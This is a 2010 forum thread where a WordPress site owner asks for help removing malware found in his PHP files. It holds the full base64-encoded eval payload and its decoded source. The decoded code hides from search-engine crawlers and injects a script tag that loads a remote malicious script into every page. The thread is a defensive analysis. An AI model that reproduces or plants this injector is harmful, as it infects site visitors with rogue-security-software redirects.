Anyone know a wordpress plugin to automatically delete dodgy script in php files

Discussion in 'PHP' started by ozziememz, Aug 8, 2010.

0
  1. #1
    iv got this bastad of a virus code in my php files

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dmJteHBibVZwYzJSMVpHVnpZMkZ5Y3k1amIyMHZZMjh1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
     
    ozziememz, Aug 8, 2010 IP
  2. danx10

    danx10 Peon

    Messages:
    1,179
    Likes Received:
    44
    Best Answers:
    2
    Trophy Points:
    0
    #2
    Decoded:

    <?php
  if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
      $GLOBALS['mr_no'] = 1;
      if (!function_exists('mrobh')) {
          if (!function_exists('gml')) {
              function gml()
              {
                  if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo"))) {
                      return '<script src="http://onlineisdudescars.com/co.php"></script>';
                  }
                  return "";
              }
          }
          if (!function_exists('gzdecode')) {
              function gzdecode($R5A9CF1B497502ACA23C8F611A564684C)
              {
                  $R30B2AB8DC1496D06B230A71D8962AF5D = @ord(@substr($R5A9CF1B497502ACA23C8F611A564684C, 3, 1));
                  $RBE4C4D037E939226F65812885A53DAD9 = 10;
                  $RA3D52E52A48936CDE0F5356BB08652F2 = 0;
                  if ($R30B2AB8DC1496D06B230A71D8962AF5D & 4) {
                      $R63BEDE6B19266D4EFEAD07A4D91E29EB = @unpack('v', substr($R5A9CF1B497502ACA23C8F611A564684C, 10, 2));
                      $R63BEDE6B19266D4EFEAD07A4D91E29EB = $R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                      $RBE4C4D037E939226F65812885A53DAD9 += 2 + $R63BEDE6B19266D4EFEAD07A4D91E29EB;
                  }
                  if ($R30B2AB8DC1496D06B230A71D8962AF5D & 8) {
                      $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C, chr(0), $RBE4C4D037E939226F65812885A53DAD9) + 1;
                  }
                  if ($R30B2AB8DC1496D06B230A71D8962AF5D & 16) {
                      $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C, chr(0), $RBE4C4D037E939226F65812885A53DAD9) + 1;
                  }
                  if ($R30B2AB8DC1496D06B230A71D8962AF5D & 2) {
                      $RBE4C4D037E939226F65812885A53DAD9 += 2;
                  }
                  $R034AE2AB94F99CC81B389A1822DA3353 = @gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C, $RBE4C4D037E939226F65812885A53DAD9));
                  if ($R034AE2AB94F99CC81B389A1822DA3353 === false) {
                      $R034AE2AB94F99CC81B389A1822DA3353 = $R5A9CF1B497502ACA23C8F611A564684C;
                  }
                  return $R034AE2AB94F99CC81B389A1822DA3353;
              }
          }
          function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
          {
              header('Content-Encoding: none');
              $RA179ABD3A7B9E28C369F7B59C51B81DE = gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
              if (preg_match('/\<\/body/si', $RA179ABD3A7B9E28C369F7B59C51B81DE)) {
                  return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $RA179ABD3A7B9E28C369F7B59C51B81DE);
              } else {
                  return $RA179ABD3A7B9E28C369F7B59C51B81DE . gml();
              }
          }
          ob_start('mrobh');
      }
  }
?>
    PHP:
    Looks like; it checks if its not a bot then embeds the following file: hxxp://onlineisdudescars.com/co.php in your page.

    If you'd like to know what the above fille does; to save anyone directly browsing the above file (which could be potentially harmful), you can view the source remotely:

    htt://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fonlineisdudescars.com%2Fco.php

    If you look at the above source ^ it redirects you to:

    hxxp://www4.my-shield32.co.cc/?p=p52dcWplbnCHnc3KbmNToKV1iqHWnG3MXsaYk2mdZJuexw%3D%3D

    Which is a form of malware: http://en.wikipedia.org/wiki/Rogue_security_software

    *All harmful url's are replaced with hxxp to prevent damage to users computers.

    ---------------------------------------------
    Advice to the OP:

    1. Download Malwarebytes' Anti-Malware (free version)

    2. Double click the downloaded file to install the application on your computer.

    3. Once the application is installed, double click on the Malwarebytes' Anti-Malware icon to start the program.

    4. When the application is open, select Scan and the application will guide you through the remaining steps.

    Once the Scan is done save the log (text file) and include it in your next reply or PM me - for analysis.
     
    Last edited: Aug 8, 2010
    danx10, Aug 8, 2010 IP
  3. extremephp

    extremephp Peon

    Messages:
    1,290
    Likes Received:
    32
    Best Answers:
    0
    Trophy Points:
    0
    #3
    The is the decoded Code!! Well, Purely an Attack or Malware Working On!! Clean it up or end up Wrecked!

    ~Exp~
     
    extremephp, Aug 8, 2010 IP
  4. ozziememz

    ozziememz Peon

    Messages:
    17
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #4
    yeah its a mean one, its in all my php files, iv deleted all the ones from my wordpress dashboard, just need to delete it from sever php files....i cant get into them cos the other guy i work (more technical) with is on holiday and he has all the login details

    anyone have any advice??
     
    ozziememz, Aug 8, 2010 IP